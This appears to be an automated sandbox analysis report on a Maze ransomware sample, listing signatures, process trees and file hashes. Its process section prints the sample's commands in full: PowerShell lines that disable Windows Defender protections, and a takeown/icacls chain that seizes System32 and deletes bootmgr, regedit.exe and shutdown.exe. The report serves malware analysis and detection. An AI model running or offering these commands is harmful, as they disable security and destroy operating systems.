Analysis
-
max time kernel
349s -
max time network
1566s -
platform
windows11_x64 -
resource
win11 -
submitted
27-10-2021 09:06
Static task
static1
Behavioral task
behavioral1
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win11
General
Malware Config
Extracted
C:\DECRYPT-FILES.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
VSSVC.exepid Process 1556 VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exetakeown.exepid Process 4300 icacls.exe 2280 takeown.exe 3360 takeown.exe 4872 icacls.exe 4732 takeown.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
VSSVC.exeb53415f6_lcvDB3iF4J.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b53415f6_lcvDB3iF4J.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid Process 3360 takeown.exe 4872 icacls.exe 4732 takeown.exe 4300 icacls.exe 2280 takeown.exe -
Processes:
resource yara_rule behavioral2/memory/2876-148-0x0000000000BC0000-0x0000000000BC1000-memory.dmp themida behavioral2/files/0x000300000002b1ac-166.dat themida behavioral2/files/0x000300000002b1ac-165.dat themida behavioral2/memory/1556-187-0x0000000000CA0000-0x0000000000CA1000-memory.dmp themida -
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exepid Process 2876 b53415f6_lcvDB3iF4J.exe 1556 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 4228 powershell.exe 3152 powershell.exe 2916 powershell.exe 1616 powershell.exe 1616 powershell.exe 4228 powershell.exe 3152 powershell.exe 2916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
b53415f6_lcvDB3iF4J.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2876 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 2876 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeIncreaseQuotaPrivilege 2916 powershell.exe Token: SeSecurityPrivilege 2916 powershell.exe Token: SeTakeOwnershipPrivilege 2916 powershell.exe Token: SeLoadDriverPrivilege 2916 powershell.exe Token: SeSystemProfilePrivilege 2916 powershell.exe Token: SeSystemtimePrivilege 2916 powershell.exe Token: SeProfSingleProcessPrivilege 2916 powershell.exe Token: SeIncBasePriorityPrivilege 2916 powershell.exe Token: SeCreatePagefilePrivilege 2916 powershell.exe Token: SeBackupPrivilege 2916 powershell.exe Token: SeRestorePrivilege 2916 powershell.exe Token: SeShutdownPrivilege 2916 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeSystemEnvironmentPrivilege 2916 powershell.exe Token: SeRemoteShutdownPrivilege 2916 powershell.exe Token: SeUndockPrivilege 2916 powershell.exe Token: SeManageVolumePrivilege 2916 powershell.exe Token: 33 2916 powershell.exe Token: 34 2916 powershell.exe Token: 35 2916 powershell.exe Token: 36 2916 powershell.exe Token: SeIncreaseQuotaPrivilege 4228 powershell.exe Token: SeSecurityPrivilege 4228 powershell.exe Token: SeTakeOwnershipPrivilege 4228 powershell.exe Token: SeLoadDriverPrivilege 4228 powershell.exe Token: SeSystemProfilePrivilege 4228 powershell.exe Token: SeSystemtimePrivilege 4228 powershell.exe Token: SeProfSingleProcessPrivilege 4228 powershell.exe Token: SeIncBasePriorityPrivilege 4228 powershell.exe Token: SeCreatePagefilePrivilege 4228 powershell.exe Token: SeBackupPrivilege 4228 powershell.exe Token: SeRestorePrivilege 4228 powershell.exe Token: SeShutdownPrivilege 4228 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeSystemEnvironmentPrivilege 4228 powershell.exe Token: SeRemoteShutdownPrivilege 4228 powershell.exe Token: SeUndockPrivilege 4228 powershell.exe Token: SeManageVolumePrivilege 4228 powershell.exe Token: 33 4228 powershell.exe Token: 34 4228 powershell.exe Token: 35 4228 powershell.exe Token: 36 4228 powershell.exe Token: SeIncreaseQuotaPrivilege 1616 powershell.exe Token: SeSecurityPrivilege 1616 powershell.exe Token: SeTakeOwnershipPrivilege 1616 powershell.exe Token: SeLoadDriverPrivilege 1616 powershell.exe Token: SeSystemProfilePrivilege 1616 powershell.exe Token: SeSystemtimePrivilege 1616 powershell.exe Token: SeProfSingleProcessPrivilege 1616 powershell.exe Token: SeIncBasePriorityPrivilege 1616 powershell.exe Token: SeCreatePagefilePrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeRestorePrivilege 1616 powershell.exe Token: SeShutdownPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeSystemEnvironmentPrivilege 1616 powershell.exe Token: SeRemoteShutdownPrivilege 1616 powershell.exe Token: SeUndockPrivilege 1616 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.execmd.exedescription pid Process procid_target PID 2876 wrote to memory of 4228 2876 b53415f6_lcvDB3iF4J.exe 81 PID 2876 wrote to memory of 4228 2876 b53415f6_lcvDB3iF4J.exe 81 PID 2876 wrote to memory of 4228 2876 b53415f6_lcvDB3iF4J.exe 81 PID 2876 wrote to memory of 1616 2876 b53415f6_lcvDB3iF4J.exe 83 PID 2876 wrote to memory of 1616 2876 b53415f6_lcvDB3iF4J.exe 83 PID 2876 wrote to memory of 1616 2876 b53415f6_lcvDB3iF4J.exe 83 PID 2876 wrote to memory of 2916 2876 b53415f6_lcvDB3iF4J.exe 84 PID 2876 wrote to memory of 2916 2876 b53415f6_lcvDB3iF4J.exe 84 PID 2876 wrote to memory of 2916 2876 b53415f6_lcvDB3iF4J.exe 84 PID 2876 wrote to memory of 3152 2876 b53415f6_lcvDB3iF4J.exe 87 PID 2876 wrote to memory of 3152 2876 b53415f6_lcvDB3iF4J.exe 87 PID 2876 wrote to memory of 3152 2876 b53415f6_lcvDB3iF4J.exe 87 PID 2876 wrote to memory of 1556 2876 b53415f6_lcvDB3iF4J.exe 89 PID 2876 wrote to memory of 1556 2876 b53415f6_lcvDB3iF4J.exe 89 PID 2876 wrote to memory of 1556 2876 b53415f6_lcvDB3iF4J.exe 89 PID 1556 wrote to memory of 2064 1556 VSSVC.exe 91 PID 1556 wrote to memory of 2064 1556 VSSVC.exe 91 PID 1556 wrote to memory of 2064 1556 VSSVC.exe 91 PID 2064 wrote to memory of 3360 2064 cmd.exe 93 PID 2064 wrote to memory of 3360 2064 cmd.exe 93 PID 2064 wrote to memory of 3360 2064 cmd.exe 93 PID 2064 wrote to memory of 4872 2064 cmd.exe 94 PID 2064 wrote to memory of 4872 2064 cmd.exe 94 PID 2064 wrote to memory of 4872 2064 cmd.exe 94 PID 2064 wrote to memory of 4732 2064 cmd.exe 95 PID 2064 wrote to memory of 4732 2064 cmd.exe 95 PID 2064 wrote to memory of 4732 2064 cmd.exe 95 PID 2064 wrote to memory of 4300 2064 cmd.exe 96 PID 2064 wrote to memory of 4300 2064 cmd.exe 96 PID 2064 wrote to memory of 4300 2064 cmd.exe 96 PID 2064 wrote to memory of 2280 2064 cmd.exe 97 PID 2064 wrote to memory of 2280 2064 cmd.exe 97 PID 2064 wrote to memory of 2280 2064 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3360
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4732
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2280
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1f44ea38384d3df0d45b027825ce5a6a
SHA1f50e4af252f1fdc7202968ab7e43fde2f8f9a944
SHA25662cd2de3714542b49ff831972415e443743602129bf84e07268a51599c3ed9b8
SHA512571df704ef24ec84ed7131d2d0ff6f961b191bdfcde0cd0e944e91cccbe7f8cd70a83c832be1c9c0694858bc4273fd053ee9480155d4e79f99965039a80794d5
-
MD5
f6b424b3b2b46b0ba51a86aa5d27959f
SHA1ff69c0d6cc7d30d0bd895c5131ab253e304ace01
SHA2560e3c0bab7069a23271c0777af1d0df58e865d024196456272eab41414ebdfeca
SHA51227ff79ac5ac0a3e6fd826075731fc9c6215e0f2daf51f2860621b68717e5704392f9c5f7c78c4a3f8eadda3ba15771bf267d5d893b7bd38e515d2029224b19a3
-
MD5
283293fda4cdb8929f1547c55e29fe42
SHA1f903a9daca3a941302f02b0f7321764a95edf8f5
SHA256fe837edb430596581828f0fe79fdddaf46ef9e2ed8f47b9767ad57528420ba1a
SHA512a8ca3dbd66fd6b999a64d97b8e262213823fea9080902ae86d25b7e544efc67d4955fcf325c44662f16123a80b33e87ab7c0cb104d7e07a1c01e3440733459ce
-
MD5
2665375f88d32cc80aa7a57fde89a738
SHA1b365c5004534bb184be68dd681cd9bd171011795
SHA25673649e60220f41cc8944da72547aceb58de5bbde117db8c32cc482fe84850b5e
SHA5121885f33b185cfe3ab8908866791e7b5009f0709aa094dde69f46b904b8959b35680113fcfb193a963ded72d922049535870d2523ff0e8fe92debd915429f3ba8
-
MD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
MD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00